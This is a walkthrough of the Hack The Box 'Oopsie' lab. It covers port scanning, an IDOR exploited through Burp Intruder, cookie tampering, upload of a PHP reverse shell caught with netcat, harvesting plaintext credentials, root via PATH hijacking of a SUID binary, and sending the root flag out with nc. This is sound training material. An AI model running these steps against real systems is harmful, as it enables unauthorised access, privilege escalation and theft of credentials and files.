Oopsie Walkthrough
After the Archetype Walkthrough, here i'm with Oopsie box. Let's hack and grab the flags.
In ours pervious Archetype Walkthrough, I mentioned that the starting point machines are a series of 9 easily rated machines that should be rooted in a sequence. So it means, if you need to go through this box, you must have a complete Archetype machine.
Enough talks 🥱, let's start to hack. 🐱💻
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱👤
00. Start Machine …
To start machine, Just click "Join Machine".

Then you can see the IP address for that machine. usually it is 10.10.10.28 🤠

Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success!
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# ping 10.10.10.28 -c 2
PING 10.10.10.28 (10.10.10.28) 56(84) bytes of data.
64 bytes from 10.10.10.28: icmp_seq=1 ttl=63 time=268 ms
64 bytes from 10.10.10.28: icmp_seq=2 ttl=63 time=282 ms
--- 10.10.10.28 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 267.817/274.911/282.006/7.094 ms
As a ping result, It's TTL=63. There is one route between machine and us (VPN) so it's definitely it will be Linux machine.
01. Enumeration First …
01.1 Fast ports scan
As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output 👇
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:28 EDT
Initiating Ping Scan at 05:28
Scanning 10.10.10.28 [4 ports]
Completed Ping Scan at 05:28, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 05:28
Scanning 10.10.10.28 [65535 ports]
Discovered open port 80/tcp on 10.10.10.28
Discovered open port 22/tcp on 10.10.10.28
SYN Stealth Scan Timing: About 31.38% done; ETC: 05:29 (0:01:08 remaining)
Completed SYN Stealth Scan at 05:30, 108.95s elapsed (65535 total ports)
Nmap scan report for 10.10.10.28
Host is up, received echo-reply ttl 63 (0.32s latency).
Scanned at 2021-04-16 05:28:18 EDT for 109s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63 * (Interesting)
80/tcp open http syn-ack ttl 63 * (Interesting)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 109.41 seconds
Raw packets sent: 93007 (4.092MB) | Rcvd: 92692 (3.708MB)
Now we know which ports are open, Here we can see some * (Interesting) ports.
01.2 Run Nmap Scripting Engine
To get the best result we can run the Nmap Scripting Engine
for all open ports. Now we know all the open ports. So we can point out and run the script engine as fast as possible.
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 22,80 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:33 EDT
Nmap scan report for 10.10.10.28
Host is up (0.39s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds
I have some trick to identify the Operating System using SSH version. I got it from IppSec's walkthroughs. Thanks IppSec for your valuable walkthroughs 🙏. Here is the trick. If you see the SSH version like "OpenSSH 7.6p1 Ubuntu 4ubuntu0.3" just copy it and search through google. In the search results you can find domain called launchpad.net. It contains some important details like Ubuntu Releases, last update, publishing details and more important is builds. Likewise, in this case it is Bionic.

Now we know the operating system is Ubuntu and we have open ports 22 (SSH) and 80 (HTTP). Let's go to the port 80 first.
01.3 Discover more on port 80
Open web browser and Burp Suite. Type http://10.10.10.28/

Here we got a nice landing page. First thing first; view source code and look if we have any interesting things. Unfortunately, nothing interesting found. Then we can see the traffic on burp.

In here, you can find some endpoint, so let's jump into it.

But I got nothing, it's just a blank page. Hmm, what about "http://10.10.10.28/cdn-cgi/login/" ah, let's check...

It contains a login page. lets check basic default username password like,
admin : admin
admin : admin123
admin : password
admin : pa$$w0rd
Nothing worked.😢 Oh wait, wait.. Do you remember we got some password at the end of Archetype machine? Try to remember, it was "MEGACORP_4dm1n!!". Let's check this one as well.
admin : MEGACORP_4dm1n!!

We got our admin panel. and now it's time to check page source. so let's check page source.

Here we have some interesting links. let's check one-by-one.

In upload section they say "if you need to upload anything, please be a superadmin !". hmm ok let's check other ones.

Oh!, now I smell some IDOR vulnerability. Isn't it ?? Let's check ..

I send this request to burp intruder and change settings like below 👇


Let's start the attack.

Above I sorted the output result by the length, There are more users and now I got a super admin Access ID and Email. So let's jump back to the upload section again. But now we intercept the web traffic through burp proxy.

When you refresh the page you can see the cookie contain something like user id and role. so let's alter those values by super admin and then click forward the traffic.

02. Foothold
Let's bump to the upload page, and now it accessible.

Let's check whether we can upload PHP web shell or what kind of file type are they need to be uploaded. First copy the PHP Reverse shell to our current directory.
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .
Then we can open that php-reverse-shell.php
whatever text editor you like and edit the below changes. 👇

And I rename that file to hiddenwiki.php
. Let's upload the file.

File has been uploaded, Now we need to find where the file is.
We have lots of fuzzing tools, but I personally love Mauro Soria's Dirsearch tool. it has amazing output and also can customize the script because it was written using python3. For the wordlist I used Daniel Miessler's SecLists.
Now power up the dirsearch
tool and wait for the results.
dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
From the beginning of the results we got directory called uploads
.
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# /opt/dirsearch/dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt 1 ⨯
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js, txt, xhtml | HTTP method: GET | Threads: 30 | Wordlist size: 560493
Error Log: /opt/dirsearch/logs/errors-21-04-16_09-31-10.log
Target: http://10.10.10.28/
Output File: /opt/dirsearch/reports/10.10.10.28/_21-04-16_09-31-11.txt
[09:31:11] Starting:
[09:31:16] 403 - 276B - /js/ (Added to queue)
[09:31:16] 301 - 307B - /js -> http://10.10.10.28/js/
[09:31:17] 403 - 276B - /images/ (Added to queue)
[09:31:17] 403 - 276B - /css/ (Added to queue)
[09:31:17] 301 - 308B - /css -> http://10.10.10.28/css/
[09:31:18] 301 - 311B - /images -> http://10.10.10.28/images/
[09:31:18] 301 - 311B - /themes -> http://10.10.10.28/themes/ (Added to queue)
[09:31:18] 403 - 276B - /themes/
[09:31:22] 301 - 312B - /uploads -> http://10.10.10.28/uploads/ (Added to queue)
[09:31:22] 403 - 276B - /uploads/
[09:31:37] 200 - 11KB - /index.php
[09:31:40] 403 - 276B - /fonts/ (Added to queue)
[09:31:40] 301 - 310B - /fonts -> http://10.10.10.28/fonts/
Now it's time to powerup netcat listener and we can use curl command to fetch the uploaded file.
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# curl http://10.10.10.28/uploads/hiddenwiki.php

We land a shell as www-data
and proceed to upgrade it. Type below command to spawn our shell 👇
python3 -c 'import pty;pty.spawn("/bin/bash")'
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.101] from (UNKNOWN) [10.10.10.28] 53294
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
12:18:36 up 5:32, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@oopsie:/$ pwd
pwd
/
www-data@oopsie:/$
First check web user directory where it has some interesting information.
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php db.php index.php script.js
Here we found db.php
file in /var/www/html/cdn-cgi/
login directory. let's view this file.
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
Oh! here we found new user credentials.
robert:M3g4C0rpUs3r!
So let’s access Robert’s user, providing the password found. su robert
www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!
robert@oopsie:/var/www/html/cdn-cgi/login$
Yes it works and now we are in robert user. we can view our user flag now. Let's check and submit it to HTB.
robert@oopsie:~$ cat user.txt
cat user.txt
f2c74*******************b7981

03. Privilege Escalation
Now we are on the last step. we need to find root flag.
Now we are robert. So again, look around the file system, First we can use id
command to verify in which user group we are now. Let's check it.
robert@oopsie:/$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
As above result; we see that this robert is part of a bugtrack
group. Now let's check for what files this group has the access.
find / -type f -group bugtracker 2> /dev/null
robert@oopsie:/$ find / -type f -group bugtracker 2> /dev/null
find / -type f -group bugtracker 2> /dev/null
/usr/bin/bugtracker
There is a binary file calledbugtracker
and also we notice that it has SUID permissions.
robert@oopsie:/$ ls -l /usr/bin/bugtracker
ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
Let's run the file and check what are the mess around that file.
robert@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 000
000
---------------
cat: /root/reports/000: No such file or directory
Nothing interesting found. let's check strings
command to analyze the binary file for any hard-coded information.
strings /usr/bin/bugtracker

When looking around the output, you can see that it looks like a system command which is calling the cat
command using the relative path instead of the absolute path. So what's on your mind now. yes we can create malicious file called cat and modifying the path to include the current working directory. Using that method we can abuse this misconfiguration and escalate our privileges to root.
Let's create the file, make it as executable and add the current working directory to PATH.
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
export PATH=/tmp:$PATH
Now let's run the /usr/bin/bugtracker
binary again.

Now we are landing as root. The last step; let's check the root flag and submit it to the HTB.
-- On the receiving end (My host)
nc -l -p 7878 > root.txt
-- On the sending end (Oopsie machine)
nc -w 3 destination-ip 7878 < root.txt
Here is the output 👇


04. Post Exploitation
Inside root's folder, we see a .config
folder, which contains a FileZilla
config file with the credentials ftpuser : mc@F1l3ZilL4
visible in plain text.

That’s all for now! We’ll keep in mind that some of the info collected (like credentials, folders…) can be useful in the next 7 labs of the ‘Starting Point’ path. Thanks for reading and happy hacking!
Find me on @twitter
Last updated
Was this helpful?